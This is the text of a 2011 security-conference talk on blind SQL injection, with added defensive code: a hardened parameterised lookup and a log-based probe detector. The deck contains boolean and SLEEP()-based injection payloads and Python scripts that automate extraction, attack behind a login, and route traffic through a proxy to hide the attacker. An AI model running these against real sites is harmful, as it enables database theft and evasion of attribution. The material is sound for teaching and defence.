Blind SQL injection in plain English - University of Texas ... · Blind vs Normal SQL injection :...
BLIND SQL INJECTION (in plain English)
by Duong Ngo, Information Security Specialist
TexSAW @ UT Dallas - Oct 2011
Why do I need to know about Blind SQL injection?
Because you don't want to be like them (i.e. pwned by Blind SQL injection).
Blind vs normal SQL injection: the difference
Only one: you don't get helpful error messages like this.
Basic Blind SQL injection
TAKE A LOOK AT THIS VULNERABLE SHOPPING WEBSITE
TEST BY ADDING "AND 1=0"
CONFIRM AGAIN BY ADDING "AND 1=1"
THE QUERY BEHIND THE SCENE p1
THE QUERY BEHIND THE SCENE p2
THE QUERY BEHIND THE SCENE p3
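The three "query behind the scene" slides survive here only as titles, so as an added illustration (not the deck's own code) here is a minimal sqlite3 model of that shopping-page lookup. The concatenated query answers differently for `1 AND 1=1` and `1 AND 1=0`, which is exactly the one-bit oracle the deck drives; the hardened lookup validates `item_id` as an integer and binds it as a parameter, so both probes get the same answer and the oracle disappears. The `items` table, its columns and the sample rows are assumptions constructed for the example; the "No item found" message is the one the deck tests for.

```python
import sqlite3

# Constructed sample catalogue standing in for the deck's vulnerable shopping site.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE items (item_id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO items VALUES (?, ?)",
                 [(1, "Laptop"), (2, "Phone"), (3, "Headphones")])


def lookup_vulnerable(item_id):
    """The query behind the scene as the deck describes it: the raw ?item_id=
    value is pasted into the SQL text, so "AND 1=0" becomes part of the WHERE
    clause instead of part of the value being compared."""
    sql = "SELECT name FROM items WHERE item_id = " + item_id
    row = conn.execute(sql).fetchone()
    return row[0] if row else "No item found"


def lookup_hardened(item_id):
    """Hardened form: reject anything that is not an integer, then bind the
    value as a parameter. The database never parses attacker-controlled SQL,
    so a true probe and a false probe are indistinguishable to the client."""
    try:
        value = int(item_id)
    except ValueError:
        return "Bad request"  # identical answer for every non-numeric probe
    row = conn.execute("SELECT name FROM items WHERE item_id = ?", (value,)).fetchone()
    return row[0] if row else "No item found"


def has_boolean_oracle(lookup):
    """True when the deck's two probes are distinguishable, i.e. when the page
    leaks one bit of query outcome per request."""
    return lookup("1 AND 1=1") != lookup("1 AND 1=0")


if __name__ == "__main__":
    print(lookup_vulnerable("1 AND 1=1"), "|", lookup_vulnerable("1 AND 1=0"))
    print(has_boolean_oracle(lookup_vulnerable), has_boolean_oracle(lookup_hardened))
```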
UHM, LET'S LISTEN TO THIS CONVERSATION
A LITTLE BIT MORE ADVANCED
TOTALLY BLIND SQL injection: NO VISIBLE DIFFERENCE!
HOW DO WE ATTACK?
Time-based attack - It's time to go Sleep!

```sql
UNION SELECT IF(1=1, SLEEP(10), NULL);
```
It's sleeping ....
So now it goes back to normal blind SQL injection
Blind SQL injections are time-consuming (especially with sleep()... z.zz.zzz)
Why not automate it?
Let Python do it for you...

Request a URL:

```python
import urllib2

site = "http://a.com/vuln.php?item_id="
payload = "1 AND 1=0"
target = site + payload
html_result = urllib2.urlopen(target).read()
```

Read result for normal case:

```python
if html_result.find("No item found") == -1:
    pass  # our clause is True
else:
    pass  # our clause is False
```
Automated blind SQLi Attack
Confirm result (timeout method)
```python
import socket
import urllib2

socket.setdefaulttimeout(8)  # wait 8 seconds

try:
    # send request to tell the DB to sleep
    html_result = urllib2.urlopen(target).read()
    # our clause is False (DB doesn't sleep)
except socket.timeout:
    # our clause is True (DB is sleeping and can't respond)
    pass
```
Automated Timing Attack - illustration
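Both automation loops above, the "No item found" check and the socket-timeout check, leave a recognisable trace in the web server's own access log: a burst of requests to one parameter whose values differ only in the injected condition, and, for the timing variant, a request whose service time jumps to the SLEEP() duration. As an added example from the defender's side (not part of the deck), this detector parses constructed log lines in Apache combined format with the seconds-to-serve field (`%T`) appended, flags the deck's probe patterns per client IP, and marks responses slow enough to be a sleeping database. The IP addresses, paths and threshold are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines: Apache combined format with "%T" (seconds taken) appended.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2011:10:00:01 -0500] "GET /vuln.php?item_id=1 HTTP/1.1" 200 5120 0
198.51.100.7 - - [10/Oct/2011:10:00:02 -0500] "GET /vuln.php?item_id=1+AND+1%3D0 HTTP/1.1" 200 812 0
198.51.100.7 - - [10/Oct/2011:10:00:03 -0500] "GET /vuln.php?item_id=1+AND+1%3D1 HTTP/1.1" 200 5120 0
198.51.100.7 - - [10/Oct/2011:10:00:04 -0500] "GET /vuln.php?item_id=1+UNION+SELECT+IF(1%3D1,SLEEP(10),NULL) HTTP/1.1" 200 5120 10
203.0.113.9 - - [10/Oct/2011:10:00:05 -0500] "GET /vuln.php?item_id=2 HTTP/1.1" 200 4980 0
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                     r'(?P<status>\d+) (?P<size>\S+) (?P<secs>\d+)$')
# Indicators taken from the deck's own probes ("AND 1=0" / "AND 1=1" and SLEEP()),
# matched against the URL-decoded query string.
BOOLEAN_RE = re.compile(r'\b(AND|OR)\s+\d+\s*=\s*\d+', re.I)
TIMING_RE = re.compile(r'\bSLEEP\s*\(', re.I)
SLOW_SECONDS = 5  # an item lookup that takes this long is a timing-attack tell


def parse_line(line):
    """Split one log line into fields; return None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["secs"] = int(rec["secs"])
    rec["query"] = unquote_plus(rec["path"].partition("?")[2])
    return rec


def classify(rec):
    """Return the indicators one request triggers, in a fixed order."""
    hits = []
    if BOOLEAN_RE.search(rec["query"]):
        hits.append("boolean-probe")
    if TIMING_RE.search(rec["query"]):
        hits.append("timing-payload")
    if rec["secs"] >= SLOW_SECONDS:
        hits.append("slow-response")
    return hits


def scan(log_text):
    """Group indicators per client IP; a probe pair plus a slow SLEEP() request from one address is the loop above."""
    report = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            report[rec["ip"]].extend(classify(rec))
    return {ip: hits for ip, hits in report.items() if hits}
```

Run `scan(open("access.log").read())` on a real log to get the per-IP indicator list; clients that trigger both a boolean pair and a slow response are the ones worth blocking or investigating first.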
Attack through authentication
```python
import cookielib
import urllib
import urllib2

cookie_jar = cookielib.CookieJar()

# open the url with cookie
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))

site_login = "http://a.com/login.php"
params = urllib.urlencode({"username": "myuser", "pwd": "123"})

# login first
opener.open(site_login, params)

# execute our attack with our cookie set
html_result = opener.open(target).read()
```
Automated member area attack - illustration
Attack with Confidence :) (through proxies)
```python
import socket
import socks
import urllib2

# our proxy
server = "202.12.0.23"
port = 8080

# set connection via proxy
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, server, port)
socket.socket = socks.socksocket

# attack safely!
html_result = urllib2.urlopen(target).read()
```
Automated Attack through proxy
Finally, we get here... :) THANK YOU FOR LISTENING!!
If you are looking for someone to do pen-testing or any security-related work, I'm glad to help you with that.
email me: [email protected]